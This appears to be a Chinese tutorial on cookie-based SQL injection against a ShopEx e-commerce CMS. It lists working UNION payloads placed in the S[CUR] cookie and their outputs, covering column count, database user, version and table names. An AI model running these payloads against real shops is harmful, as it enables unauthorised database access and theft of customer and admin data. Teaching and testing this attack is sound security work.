cookie注入

首先随便打开一件商品的页面

用burpsuite抓包

可以看到这是一个静态页面，无法通过GET传参

尝试用修改cookie看是否存在注入点，这里我们直接使用Google的插件cookie manager

修改S[CUR]的值，用双引号闭合，出现了报错信息

window.addEvent('domready',function(){

var barId ="<{$widgets_id}>";

var bar = $('foobar_'+barId);

var barOptions = {

MID:Cookie.get('S[MEMBER]'),

uname:Cookie.get('S[UNAME]'),

coin:<{$data.cur|default:'null'}>,

curCoin:Cookie.get('S[CUR]'),

cartViewURl:'<{link ctl="cart" act="view"}>',

stick:<{if $setting.stick}>true<{else}>false<{/if}>

};

if(barOptions.MID){$('uname_'+barId).setText(barOptions.uname);}

由此，可以开始进行SQL注入

1.查询字段数

CNY" order by 6#    //无回显

CNY" order by 7#    //有回显

说明字段数是六

CNY" and 1=2 union select 1,2,3,4,5,6#

说明三号位是回显位

2.查询user() ，database()，version()

CNY" and 1=2 union select 1,2,user(),4,9,6# //结果为test@localhost

同理可以查询出

CNY" and 1=2 union select 1,2,version(),4,9,6# //5.0.51b-community-nt-log

CNY" and 1=2 union select 1,2,database(),4,9,6#  //shopex

3.查询表名

对于成熟的CMS，表名往往是相对固定的

and 1=2 union select 1,2,group_concat(table_name),4,5,6 from information_schema.tables where table_schema='shopex'#

//结果：sdb_admin_roles,sdb_advance_logs,sdb_articles,sdb_autosync_rule,sdb_autosync_rule_relation,sdb_autosync_task,sdb_brand,sdb_cachemgr,sdb_comments,sdb_cost_sync,sdb_coupons,sdb_coupons_p_items,sdb_coupons_u_items,sdb_ctlmap,sdb_currency,sdb_dapi,sdb_dbver,sdb_delivery,sdb_delivery_item,sdb_dly_area,sdb_dly_center,sdb_dly_corp,sdb_dly_h_area

4.之后可以继续查询user表，admin表，passwd表，之后就不在演示了